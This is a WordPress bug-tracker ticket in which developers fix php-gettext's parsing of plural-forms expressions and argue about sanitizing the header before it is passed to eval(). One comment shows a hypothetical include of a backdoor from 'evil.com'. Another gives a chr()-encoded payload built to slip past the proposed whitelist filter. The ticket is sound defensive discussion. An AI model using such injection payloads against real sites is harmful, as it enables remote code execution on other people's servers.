Opened 18 years ago
Closed 18 years ago
#4005 closed defect (bug) (fixed)
php-gettext's plural forms parsing is broken for nplurals>2
Reported by: |
|
Owned by: |
|
---|---|---|---|
Milestone: | 2.2 | Priority: | high |
Severity: | normal | Version: | 2.1.2 |
Component: | I18N | Keywords: | has-patch i18n |
Focuses: | Cc: |
Description
Complicated Plural-Forms expression get evaluated wrongly by php-gettext, so that languages with more than two plural forms (e.g. Lithuanian, Slovenian, etc.) don't get the correct plural form for ngettext calls.
Attached patch (also sent upstream) fixes the issue.
Attachments (4)
Change History (25)
#1
@
18 years ago
Oh, I just realized this patch is against the original php-gettext source, but it should be easy enough to apply to your codebase.
#2
@
18 years ago
- Keywords has-patch commit added
- Milestone changed from 2.3 to 2.1.3
- Priority changed from low to high
- Version set to 2.1.2
I have faced this bug during translate WP to Arabic, but i think it is bug in plural-forms expression i used.
After applying this patch, it worked like a charm.
#6
@
18 years ago
Ryan, if you commit this, you could also remove the semicolon append code. A semicolon is always added in this one.
And just a note about the patch. Is the regex check really needed? What do we win if we sanitize it?
#7
@
18 years ago
I'm curious about the regex too. Do we really need to sanitize against a whitelist?
#8
@
18 years ago
I wrote that chunk of code for Habari, and just ported it over to php-gettext/wordpress. Sanitizing the plural-forms header seems reasonable since it will be eval()'d with only minor changes, and it is user-supplied data; in theory you could put something there like include('http://evil.com/backdoor.php')
. Since the file format is binary and WP translations are usually supplied by third parties, the input should be treated as user input and sanitized thusly.
Re nbachiyski, good catch, although multiple semicolons should not matter.
#9
@
18 years ago
For some additional explanation: PHP evaluates ternary operator expressions from left to right. Thus, for Plural-Forms like nplurals=3; plural=n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2;
:
for n = 1: (expected: 0, actual: 2)
1%10==1 && 1%100!=11 ? 0 : 1%10>=2 && 1%10<=4 && (1%100<10 || 1%100>=20) ? 1 : 2 => TRUE && TRUE ? 0 : FALSE && TRUE && (TRUE || FALSE) ? 1 : 2 => (TRUE && TRUE ? 0 : FALSE && TRUE && (TRUE || FALSE)) ? 1 : 2 => 0 ? 1 : 2 => 2
Parenthesizing the subexpressions fixes the precedence.
#10
@
18 years ago
It was hard, but being stubborn sometimes helps. Here is a string of code, which passes through your filter and includes an arbitrary file (I didn't have the nerve and just try to include d
in the sample):
ob_start(); print(chr(105)); print(chr(110)); print(chr(99)); print(chr(108)); print(chr(117)); print(chr(100)); print(chr(101)); print(chr(32)); print(chr(34)); print(chr(100)); print(chr(34)); print(chr(59)); eval(ob_get_flush());
It was not easy without neither quotes nor comas :)
Anyway, I suggest that we just write some simple parser for php's ternary expressions. There are some nice unit tests on the topic.
#11
@
18 years ago
While your string passes the sanitizing regex, the code is never actually run since in the next step (in select_string()), all 'n's are replaced with the value of $n
, which breaks the priNt
. echo would probably work. Changing the regex to:
$expr= preg_replace( '@[^plurasno0-9:;\(\)\?\|\&=!<>+*/\%-]@', '', $expr );
ought to fix that, too. (The additional 'o' in the char range is for malformed files using 'or' instead of '||'; I also removed the underscore.)
Alternatively, you could sanitize the plurals= part separately and strip semicolons and all chars but 'n' on the RHS of the assignment:
if (preg_match('/^\s*nplurals\s*=\s*(\d+)\s*;\s*plural=(.*)$/', $expr, $matches)) { $nplurals= preg_replace( '@[^0-9]@', '', $matches[1] ); $plural= preg_replace( '@[^n0-9:\(\)\?\|\&=!<>+*/\%-]@', '', $matches[2] ); $expr= 'nplurals='.$nplurals.';plural='.$plural; } else { //malformed expression, use default }
I'll submit a new patch using the second alternative.
#13
@
18 years ago
I am not sure if it is worth it to sanitize the string. There is great chance that every filtering can be compromised and cheated. Also, if somebody wants to distribute harmful code, there are surely easier ways to to it.
A side note - I think we could speed up select_string
a lot. We could just the first time compile the code using create_function
and then just call it to get the plural index. Something like (I haven't prepared the real patch yet):
$s = str_replace('n', '$n', $string); $this->choose_plural_string = create_function('$n', 'return '.$s);
After that on every call of select_string
we just return $this->choose_plural_string($n)
.
My trivial tests show that this approach is between 5 and 10 times faster. Unfortunately there aren't many plural strings, so it won't be noticeable :-)
#14
@
18 years ago
That's what I'm doing for Habari, but I didn't want to replace the complete php-gettext plural code with Habari's ;)
#15
@
18 years ago
Check http://trac.habariproject.org/habari/changeset?new=trunk%2Fhtdocs%2Fsystem%2Fclasses%2Flocale.php%40617&old=trunk%2Fhtdocs%2Fsystem%2Fclasses%2Flocale.php%40508 for Habari's implementation, if you want to port that. Since the php-gettext developers don't seem to care, I might split that code out to Yet Another PHP Gettext Project soon.
#17
@
18 years ago
- Keywords needs-patch added; has-patch commit removed
- Milestone changed from 2.2 to 2.3
#18
@
18 years ago
- Keywords has-patch added; needs-patch removed
- Milestone changed from 2.3 to 2.2
foolswisdom: This is very important for most non-English users, and there's patches working well.
@
18 years ago
moeffju's fixes + select_string enhancements + indent + none whitespace at the end of lines
#20
@
18 years ago
- Keywords i18n added
I had some free time this morning, so here is a patch. Unfortunately one can't see my changes very clearly because I couldn't stand the indentation and fixed it before coding. Here is a summary of the changes:
- Inside are Matthias' parenthesis fixes without the sanitizing (in get_plural_forms)
- The select_string is cached in a dynamically created callback (in select_string)
Anyone who sees it, please test, so we can safely put this in 2.2.
Sewar, thanks for moving the milestone. We could have easily forgotten this...
Patch against php-gettext 1.0.7 to fix plural forms parsing